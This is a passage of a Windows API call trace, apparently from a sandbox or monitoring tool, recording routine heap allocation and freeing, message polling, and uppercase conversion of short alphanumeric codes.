(in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0257.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0257.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0257.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0257.800] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0257.800] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0257.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0257.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0257.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0257.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0257.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0257.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0257.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0257.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0257.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0257.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0257.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0257.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0257.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0257.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0257.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0257.801] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0257.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0257.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0257.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0257.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0257.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0257.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0257.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0257.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0257.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0257.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0257.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0257.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0257.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0257.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0257.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0257.802] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0257.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0257.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0257.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0257.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0257.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0257.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0257.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0257.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0257.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0257.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0257.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0257.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0257.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0257.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0257.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0257.803] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0257.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0257.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0257.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0257.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0257.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0257.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0257.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0257.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0257.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0257.803] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0257.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0257.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0257.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0257.804] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.804] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0257.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0257.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.804] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.804] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0257.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0257.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0257.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0257.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0257.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.805] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0257.805] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.805] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0257.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0257.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.805] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0257.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0257.805] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0257.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0257.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0257.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0257.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0257.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0257.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.805] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0257.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0257.806] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0257.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0257.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0257.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0257.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0257.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0257.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0257.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0257.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0257.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0257.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0257.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.806] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0257.807] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.807] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0257.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0257.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.807] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.807] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0257.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0257.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0257.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0257.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0257.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.807] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0257.807] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0257.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0257.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0257.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0257.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0257.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0257.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.808] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0257.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0257.808] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0257.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0257.808] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.808] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0257.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.809] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0257.809] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.809] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0257.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.809] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.809] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0257.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0257.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0257.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0257.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0257.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.810] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0257.810] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0257.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0257.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0257.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0257.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0257.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0257.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0257.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0257.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0257.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0257.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0257.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0257.811] HeapFree (in: hHeap=0x25c0000, 